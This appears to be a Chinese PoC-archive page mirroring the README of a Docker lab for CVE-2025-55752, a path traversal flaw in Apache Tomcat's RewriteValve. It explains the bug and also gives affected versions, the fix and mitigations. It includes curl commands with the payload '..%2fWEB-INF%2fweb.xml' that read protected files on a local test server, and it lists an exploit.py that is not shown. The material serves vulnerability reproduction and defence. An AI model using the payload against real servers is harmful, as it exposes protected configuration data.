关联漏洞
标题:Apache Tomcat 安全漏洞 (CVE-2025-55752)Description:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。用于实现对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat存在安全漏洞,该漏洞源于URL重写规则存在路径遍历问题,可能导致绕过安全限制和远程代码执行。以下版本受到影响:11.0.0-M1版本至11.0.10版本、10.1.0-M1版本至10.1.44版本、9.0.0.M11版本至9.0.108版本和8.5.6版本至8.5.100版本。
介绍
# CVE-2025-55752: Apache Tomcat Path Traversal Vulnerability
Docker-based reproduction environment for CVE-2025-55752, a path traversal vulnerability in Apache Tomcat 10.1.44.
## Overview
CVE-2025-55752 is a path traversal vulnerability in Apache Tomcat's RewriteValve caused by incorrect processing
rder: **URL normalization occurs before URL decoding**. This allows attackers to bypass security constraints
rotecting directories like `/WEB-INF/` using URL-encoded path traversal sequences (`..%2f`).
### Vulnerability Characteristics
- **CVE ID**: CVE-2025-55752
- **CVSS v3.1**: 7.5 (HIGH)
- **CWE**: CWE-22 (Path Traversal)
- **Component**: Apache Tomcat RewriteValve
- **Root Cause**: Normalize-before-decode processing order
## Affected Versions
| Series | Vulnerable Versions | Patched Version |
|--------|-------------------|-----------------|
| 11.x | 11.0.0-M1 to 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 to 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 to 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 to 8.5.100 | EOL - No patch |
## Quick Start
```bash
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
```
## Vulnerability Testing
### Test 1: Direct WEB-INF Access (Protected)
```bash
curl -I 'http://localhost:8080/WEB-INF/web.xml'
```
**Expected**: `403 Forbidden`
### Test 2: Information Disclosure (Read Protected Files)
```bash
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
```
**Expected**: `200 OK` + web.xml content (vulnerability confirmed)
## How It Works
1. Request: `/download?path=..%2fWEB-INF%2fweb.xml`
2. RewriteValve rewrites to: `/files/..%2fWEB-INF%2fweb.xml`
3. **URL normalization** (before decode): `%2f` not recognized as `/`, `..` survives
4. **URL decoding**: `%2f` → `/` → `/files/../WEB-INF/web.xml`
5. Path resolution: `/WEB-INF/web.xml`
## Processing Order Issue
```
Correct: Decode → Normalize → Security Check
Vulnerable: Normalize → Decode → Security Check ✗
```
## Tomcat Fix
- **GitHub**: [apache/tomcat commit 130d36d8](https://github.com/apache/tomcat/commit/130d36d8)
- **Fix**: Decode before normalize
## Mitigation
1. Disable RewriteValve if not required
2. Disable PUT method
3. WAF rules to block `../` and `%2e%2e`
4. Upgrade to patched versions (10.1.45+, 9.0.109+, 11.0.11+)
## References
- [Apache Tomcat Security](https://tomcat.apache.org/security.html)
- [NVD - CVE-2025-55752](https://nvd.nist.gov/vuln/detail/CVE-2025-55752)
- [OWASP Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [CWE-22: Improper Limitation of a Pathname](https://cwe.mitre.org/data/definitions/22.html)
## Disclaimer
⚠️ **WARNING**: Do NOT deploy to production. Use only in isolated test environments.
文件快照
[4.0K] /data/pocs/891dee605d87c9a4b227e689fd9083d1f5b24c8b
├── [4.0K] docker
│ ├── [ 397] Dockerfile
│ ├── [4.0K] scripts
│ │ ├── [8.3K] exploit.py
│ │ └── [4.1K] test_vulnerability.sh
│ └── [4.0K] tomcat
│ ├── [4.0K] conf
│ │ ├── [ 210] context.xml
│ │ ├── [ 115] rewrite.config
│ │ └── [1.8K] server.xml
│ └── [4.0K] webapps
│ └── [4.0K] ROOT
│ ├── [4.0K] files
│ │ └── [1.8K] web.xml
│ ├── [3.8K] handler.jsp
│ ├── [3.6K] index.jsp
│ └── [4.0K] WEB-INF
│ └── [1.4K] web.xml
├── [ 391] docker-compose.yml
└── [2.8K] README.md
9 directories, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。